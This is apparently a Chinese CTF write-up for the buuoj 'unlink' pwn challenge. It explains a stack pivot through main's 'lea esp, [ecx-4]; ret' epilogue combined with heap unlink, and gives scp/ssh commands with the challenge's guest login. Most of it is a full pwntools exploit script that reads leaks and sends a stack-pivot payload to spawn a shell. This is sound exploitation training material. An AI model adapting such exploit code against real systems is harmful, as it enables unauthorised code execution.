知识点
- 栈迁移
- unlink
- gadget
分析
- 主函数的返回方式如下，通过修改 ecx 即可完成栈迁移
lea esp, [ecx-4]
retn
- 在堆上合理布局即可
细节
- 下载文件
scp -P 27873 your_username@node4.buuoj.cn:/path/to/remote/file /path/to/local/directory
- 上传文件
scp -P 27873 /path/to/local/directory your_username@node4.buuoj.cn:/path/to/remote/file
- 运行文件
s=ssh(host='node4.buuoj.cn',port=27254,user='unlink',password='guest')
io=gift['io']=s.process('./unlink')
exp
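#!/usr/bin/python3
from pwncli import *
from LibcSearcher import *  # not used below
context.log_level='debug'
#cli_script()

# Run the binary on the challenge box over ssh so the printed leaks belong
# to that environment; the guest credentials are the ones given in the writeup.
s=ssh(host='node4.buuoj.cn',port=27254,user='unlink',password='guest')
io=gift['io']=s.process('./unlink')
#io=gift['io']=process('./unlink')

# Address inside the binary that the payload finally returns to (from the writeup).
shell_addr=0x08048566


def build_payload(stack_addr, heap_base, shell_addr):
    """Return the bytes sent after the two leaks.

    Layout: 16 filler bytes, then three 32-bit little-endian words
    (``p32``): ``stack_addr + 8``, ``heap_base + 36`` and ``shell_addr``.
    The writeup only states that main returns via ``lea esp, [ecx-4]; ret``
    and that the heap is laid out so the pivot lands there; the two offsets
    are taken verbatim from the original script — TODO confirm them against
    the binary rather than trusting the constants.
    """
    return b"".join([
        b"a" * 16,
        p32(stack_addr + 8),
        p32(heap_base + 36),
        p32(shell_addr),
    ])


# First leak is printed as a 10-character "0x........" string; the second
# follows a "0x" prefix that ru() already consumed, so only 8 hex digits remain.
ru(b"address leak: ")
stack_addr = int(r(10), 16)
log_address("stack_addr : ", stack_addr)
ru(b"here is heap address leak: 0x")
heap_base = int(r(8), 16)
log_address("heap_base : ", heap_base)

sla(b"now that you have leaks, get shell!", build_payload(stack_addr, heap_base, shell_addr))
ia()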